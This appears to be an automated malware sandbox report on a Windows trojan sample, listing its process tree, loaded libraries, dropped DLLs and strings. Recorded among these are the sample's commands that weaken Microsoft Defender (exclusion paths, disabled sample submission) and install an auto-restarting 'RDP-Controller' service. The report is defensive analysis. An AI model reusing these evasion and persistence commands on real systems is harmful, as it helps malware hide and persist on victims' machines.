Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drString found in binary or memory: https://www2.mk16.de/
Source: main.exe, 00000016.00000002.3155678668.000002235025D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www2.mk16.de/J
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF77572929A inet_addr,ntohl,6_2_00007FF77572929A
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF77572292E strlen,strcat,strlen,strlen,strlen,strcat,strlen,strlen,strlen,strcat,LogonUserA,GetLastError,CreateProcessAsUserA,GetLastError,CloseHandle,CreateProcessA,GetLastError,6_2_00007FF77572292E
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile deleted: C:\Windows\Temp\sdjnUb5S
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll 5E38EA7E3DD96FE1C6BB2EBA38C7BDE638C6B6E7898F906E343D9500AFF86499
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll 0B628EA2BA9CD77621D90A0A7456659ED86C118EB7655F6074B3B5648BAC0A02
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll 64B09FAC89FC9645DFE624D832BB2FF2FC8BA6BA9BC1A96C6EEE8C7F9C021266
Source: C:\Windows\System32\icacls.exeProcess token adjusted: Security
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: String function: 00007FF7757214E2 appears 295 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF8B9181292 appears 1030 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF8BFB3A202 appears 690 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF8BFB81292 appears 754 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF8BFB52FD2 appears 774 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF6BE0399E2 appears 303 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF8BA501292 appears 394 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF8BA4F1292 appears 394 times
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: String function: 00007FF8B9151292 appears 924 times
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 432 -p 6524 -ip 6524
Source: termsrv32.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: samctl.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: cnccli.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: I77yQ5in.22.drStatic PE information: Number of sections : 11 > 10
Source: dwlmgr.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: o6oDuAJl.22.drStatic PE information: Number of sections : 11 > 10
Source: OwuZZod2.22.drStatic PE information: Number of sections : 11 > 10
Source: evtsrv.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: cZO.exeStatic PE information: Number of sections : 11 > 10
Source: XpOp833v.22.drStatic PE information: Number of sections : 11 > 10
Source: GmdNT1AN.22.drStatic PE information: Number of sections : 11 > 10
Source: libi2p.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: prgmgr.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: EgwqOk24.22.drStatic PE information: Number of sections : 11 > 10
Source: rdpctl.dll.22.drStatic PE information: Number of sections : 11 > 10
Source: YXkdIYk6.22.drStatic PE information: Number of sections : 11 > 10
Source: YkhL6reh.22.drStatic PE information: Number of sections : 11 > 10
Source: cZO.exe, 00000000.00000000.2004898378.00000000007B6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameIntegrator.exe@ vs cZO.exe
Source: cZO.exe, 00000000.00000002.2007514026.00000000025F4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs cZO.exe
Source: cZO.exe, 00000001.00000002.3262898232.0000000002724000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs cZO.exe
Source: cZO.exeBinary or memory string: OriginalFilenameIntegrator.exe@ vs cZO.exe
Source: classification engineClassification label: mal100.troj.evad.winEXE@46/72@4/59
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF77572855D CreateToolhelp32Snapshot,Process32First,Process32Next,GetLastError,GetLastError,GetLastError,OpenProcess,QueryFullProcessImageNameW,GetLastError,CloseHandle,GetLastError,CloseHandle,6_2_00007FF77572855D
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeCode function: 6_2_00007FF77573B558 DeleteCriticalSection,FindClose,FindNextFileA,FindResourceA,6_2_00007FF77573B558
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 22_2_00007FF6BE038C4A strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,22_2_00007FF6BE038C4A
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1532:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:4324:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5452:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \BaseNamedObjects\Local\WERReportingForProcess6524
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6616:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5568:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4676:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5532:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6428:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3920:120:WilError_03
Source: C:\Users\user\Desktop\cZO.exeFile created: C:\Users\user\AppData\Local\Temp\7h14dhb9g32w177ypoi9wje.bat
Source: C:\Users\user\Desktop\cZO.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7h14dhb9g32w177ypoi9wje.bat"
Source: cZO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\cZO.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\cZO.exeKey opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeFile read: C:\Users\user\AppData\Local\Temp\wfpblk.ini
Source: C:\Users\user\Desktop\cZO.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: cZO.exeVirustotal: Detection: 19%
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v6.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address_v4.ipp
Source: main.exeString found in binary or memory: C:/msys64/mingw64/include/boost/asio/ip/impl/address.ipp
Source: cZO.exeString found in binary or memory: NATS-SEFI-ADD
Source: cZO.exeString found in binary or memory: NATS-DANO-ADD
Source: cZO.exeString found in binary or memory: JIS_C6229-1984-b-add
Source: cZO.exeString found in binary or memory: jp-ocr-b-add
Source: cZO.exeString found in binary or memory: JIS_C6229-1984-hand-add
Source: cZO.exeString found in binary or memory: jp-ocr-hand-add
Source: cZO.exeString found in binary or memory: ISO_6937-2-add
Source: unknownProcess created: C:\Users\user\Desktop\cZO.exe "C:\Users\user\Desktop\cZO.exe"
Source: unknownProcess created: C:\Users\user\Desktop\cZO.exe C:\Users\user\Desktop\cZO.exe
Source: C:\Users\user\Desktop\cZO.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\7h14dhb9g32w177ypoi9wje.bat"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Users\user\Desktop\cZO.exeProcess created: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe "C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Users\user\Desktop\cZO.exeProcess created: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe "C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe"
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeProcess created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"
Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeProcess created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeProcess created: C:\Windows\System32\sc.exe sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeProcess created: C:\Windows\System32\sc.exe sc.exe failure RDP-Controller reset= 1 actions= restart/10000
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeProcess created: C:\Windows\System32\sc.exe sc.exe start RDP-Controller
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Source: C:\Windows\System32\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeProcess created: C:\Windows\System32\icacls.exe icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.acl
Source: C:\Windows\System32\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 432 -p 6524 -ip 6524
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6524 -s 1236
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Source: unknownProcess created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Source: C:\Users\user\Desktop\cZO.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6524 -s 1236
Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\cZO.exeSection loaded: apphelp.dll
Source: C:\Users\user\Desktop\cZO.exeSection loaded: version.dll
Source: C:\Users\user\Desktop\cZO.exeSection loaded: uxtheme.dll
Source: C:\Users\user\Desktop\cZO.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\cZO.exeSection loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\cZO.exeSection loaded: winsta.dll
Source: C:\Users\user\Desktop\cZO.exeSection loaded: mswsock.dll
Source: C:\Users\user\Desktop\cZO.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\vc71izwl68ub3txurufnpr09g6ni3.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: apphelp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: cryptbase.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: ntmarta.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: iphlpapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe | Section loaded: winhttp.dll
